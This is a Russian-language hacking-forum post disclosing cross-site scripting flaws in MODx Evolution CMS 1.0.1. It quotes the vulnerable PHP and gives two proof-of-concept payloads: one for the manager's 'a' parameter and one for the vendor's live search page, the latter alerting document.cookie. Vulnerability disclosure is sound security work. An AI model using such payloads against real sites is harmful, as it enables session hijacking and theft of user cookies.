Форум АНТИЧАТ - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

MODx Evolution CMS

Version 1.0.1 (скачать: http://modxcms.com/download/rc/MODx-1.0.1-rc-1.tar.gz )

XSS (нужны права админа)

\manager\includes\accesscontrol.inc.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"];

    if([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"]) {

        if (![/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'REPLACE INTO %s (internalKey, username, lasthit, action, id, ip)

            VALUES (%d, \'%s\', \'%d\', \'%s\', %s, \'%s\')'[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getFullTableName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'active_users'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#FF8000"]// Table

[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLoginUserID[/COLOR][COLOR="#007700"](),

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mgrShortname'[/COLOR][COLOR="#007700"]],

[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"],

            (string)[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#0000BB"]var_export[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]),

[/COLOR][COLOR="#0000BB"]$ip[/COLOR][/COLOR]

Result:

http://localhost/modx-1.0.1-rc-1/manager/index.php?a=2'>alert(010101)

+

XSS на Оф Сайте:

http://modxcms.com/searchresults.html

Вписываем:

">alert(document.cookie)